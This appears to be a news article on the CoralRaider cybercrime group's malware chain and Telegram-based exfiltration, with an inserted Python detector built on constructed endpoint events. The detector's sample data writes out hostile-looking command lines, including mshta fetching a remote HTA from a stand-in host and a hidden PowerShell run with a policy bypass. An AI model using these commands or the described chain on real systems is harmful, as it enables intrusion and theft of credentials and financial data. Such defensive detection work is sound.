Vietnamese Cybercrime Group CoralRaider Nets Financial Data

Published: 23/11/2024   Category: security
With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.



A newcomer cybercrime group linked to Vietnam has targeted individuals and organizations in Asia, attempting to steal social media account information and user data.
CoralRaider, which first appeared in late 2023, relies heavily on social engineering and on legitimate services for data exfiltration, and it develops custom tools for loading malware onto victim systems. Yet the group has also made some rookie mistakes, such as inadvertently infecting its own systems, which exposed its activities, threat researchers with Cisco's Talos threat intelligence group stated in a new analysis of CoralRaider.
While Vietnam has become increasingly active in cyber operations, this group does not appear to be working with the government, says Chetan Raghuprasad, security research technical leader for Cisco's Talos group.
"The main priority is financial gain, and the actor is attempting to hijack the victim's social media business and advertis[ing] accounts," he says. "The potential exposure for follow-on attacks, including delivering other malware, is also possible. Our research has not seen any examples of other payloads being delivered."
Vietnamese threat actors frequently focus on social media. The infamous OceanLotus group — also known as APT32 — has attacked other governments, dissidents, and journalists in Southeast Asian countries, including in Vietnam. A military-associated group, Force 47 — linked to the Vietnamese army's official television station — regularly attempts to influence social media groups.
CoralRaider, however, appears to be connected to profit motives rather than nationalist agendas.
"At this moment, we do not have any evidence or information on signs of CoralRaider working with the Vietnamese government," Raghuprasad says.
A CoralRaider campaign typically starts with a Windows shortcut (.LNK) file, often carrying a .PDF extension in an attempt to fool the victim into opening the file, according to the Cisco analysis. Following that, the attackers move through a series of stages in their attack:
Windows shortcut downloads and executes an HTML application (HTA) file from an attacker-controlled server
HTA file executes an embedded Visual Basic script
VB script executes a PowerShell script, which then runs three more PowerShell scripts, including a series of anti-analysis checks to detect whether the tool is running in a virtual machine, a bypass for the system's User Account Control (UAC), and code that disables any notifications to the user
Final script runs RotBot, a loader that performs detection evasion, conducts reconnaissance on the system, and downloads a configuration file
RotBot then typically downloads XClient, which collects a variety of user data from the system, including social media account credentials
In addition to credentials, XClient also steals browser data, credit card account information, and other financial data. Lastly, XClient takes a screenshot of the victim's desktop and uploads it.
Meanwhile, the researchers say there are indications that the attackers had targeted individuals in Vietnam as well.
"The [XClient] stealer function maps the stolen victim's information to hardcoded Vietnamese words and writes them to a text file on the victim machine's temporary folder before exfiltration," the analysis stated. "One example function we observed is used to steal the victim's Facebook Ads account that is hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created."
The CoralRaider group used an automated bot on the Telegram service as a command-and-control channel as well as to exfiltrate data from victims' systems. However, the cybercriminal group appears to have infected one of its own machines, because the Cisco researchers discovered screenshots of the attackers' own desktop among the information posted to the channel.
"Analyzing the images of the actor's desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named Kiém tien tử Facebook, Mua Bán Scan MINI, and Mua Bán Scan Meta," Cisco Talos stated in the analysis. Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.
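The delivery chain described above (a shortcut disguised with a document extension, mshta.exe fetching a remote HTA, mshta.exe spawning PowerShell) and the Telegram bot used for C2 and exfiltration each leave a distinct trace in endpoint telemetry. The following Python detector is an added example, not code from Cisco Talos or from the article: it reconstructs the process ancestry from constructed, Sysmon-like JSON events and flags the chain, the remote HTA launch, the double-extension shortcut, and a non-messenger process connecting to api.telegram.org. The event layout, field names, process IDs, paths and hostnames are all assumptions made for the example; none are real CoralRaider indicators.

```python
"""Detection example for the CoralRaider-style delivery chain described in the
article.  Added example, not Cisco Talos tooling; the Sysmon-like JSON event
shape, field names, PIDs, paths and hostnames below are constructed."""
import json
import re

# Constructed telemetry in a simplified Sysmon-like shape:
#   id 1 = process create, id 3 = network connect, id 11 = file create.
SAMPLE_EVENTS = [
    r'{"id": 11, "pid": 100, "image": "C:\\Windows\\explorer.exe", "target": "C:\\Users\\u\\Downloads\\Invoice.pdf.lnk"}',
    r'{"id": 1, "pid": 100, "ppid": 4, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"}',
    r'{"id": 1, "pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe", "cmd": "mshta.exe http://staging.example.invalid/update.hta"}',
    r'{"id": 1, "pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -w hidden -ep bypass -f stage2.ps1"}',
    r'{"id": 3, "pid": 300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "dest_host": "api.telegram.org", "dest_port": 443}',
    # Benign noise: a PDF reader opening a real PDF, a local HTA run from an
    # admin tool, and the real Telegram desktop client talking to its API.
    r'{"id": 1, "pid": 400, "ppid": 100, "image": "C:\\Program Files\\Reader\\Reader.exe", "cmd": "Reader.exe report.pdf"}',
    r'{"id": 1, "pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\mshta.exe", "cmd": "mshta.exe C:\\Tools\\local.hta"}',
    r'{"id": 3, "pid": 600, "image": "C:\\Users\\u\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe", "dest_host": "api.telegram.org", "dest_port": 443}',
]

# Shortcut whose visible name ends in a document extension (e.g. Invoice.pdf.lnk).
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|doc|docx|xls|xlsx|jpg|png)\.lnk$", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
# Binaries for which a connection to the Telegram API is expected on an endpoint.
TELEGRAM_ALLOWED = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(lines):
    return [json.loads(line) for line in lines]


def double_extension_shortcuts(events):
    """File-create events for shortcuts masquerading as documents."""
    return [e["target"] for e in events
            if e["id"] == 11 and DOUBLE_EXT_LNK.search(basename(e["target"]))]


def mshta_remote_launches(events):
    """PIDs of mshta.exe started with a remote URL (an HTA pulled from a server)."""
    return [e["pid"] for e in events
            if e["id"] == 1 and basename(e["image"]) == "mshta.exe"
            and REMOTE_URL.search(e["cmd"])]


def process_chains(events, chain=("explorer.exe", "mshta.exe", "powershell.exe")):
    """PIDs of the last process in any ancestry that matches `chain` exactly,
    walking child -> parent -> grandparent through the process-create events."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for proc in procs.values():
        cur = proc
        for expected in reversed(chain):
            if cur is None or basename(cur["image"]) != expected:
                break
            cur = procs.get(cur.get("ppid"))
        else:  # every link in the chain matched
            hits.append(proc["pid"])
    return hits


def telegram_beacons(events, allowed=TELEGRAM_ALLOWED):
    """PIDs of processes other than known messenger/browser binaries that
    connect to api.telegram.org, the bot channel the article describes."""
    return [e["pid"] for e in events
            if e["id"] == 3 and e["dest_host"].lower() == "api.telegram.org"
            and basename(e["image"]) not in allowed]


def analyze(lines):
    """Run all checks over raw JSON lines and return the findings by check."""
    events = parse_events(lines)
    return {
        "disguised_shortcuts": double_extension_shortcuts(events),
        "mshta_remote_pids": mshta_remote_launches(events),
        "chain_pids": process_chains(events),
        "telegram_beacon_pids": telegram_beacons(events),
    }


if __name__ == "__main__":
    for check, hits in analyze(SAMPLE_EVENTS).items():
        print(f"{check}: {hits}")
```

Each check is deliberately narrow so that the noise events (a PDF reader opening a genuine PDF, a local HTA, the real Telegram client) produce no hits; the ancestry walk in `process_chains` is the one that ties the stages together and can be re-used with a different `chain` tuple for other loader sequences.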
CoralRaider's arrival on the cyber threat scene is not surprising: Vietnam is currently facing an increase in threats from account-stealing malware, says Sakshi Grover, research manager in IDC's Cybersecurity Services group for the Asia/Pacific region.
"While historically less associated with cybercrime compared to other Asian nations, Vietnam's rapid adoption of digital technologies has made it more susceptible to cyber threats," she says. "Advanced persistent threats (APTs) are increasingly targeting government entities, critical infrastructure, and businesses, utilizing sophisticated techniques like custom malware and social engineering to infiltrate systems and steal sensitive data."
Because economic conditions vary across Vietnam — "with some areas experiencing limited job opportunities, resulting in low wages for highly skilled roles" — individuals can be incentivized to engage in cybercrime to make money, Grover says.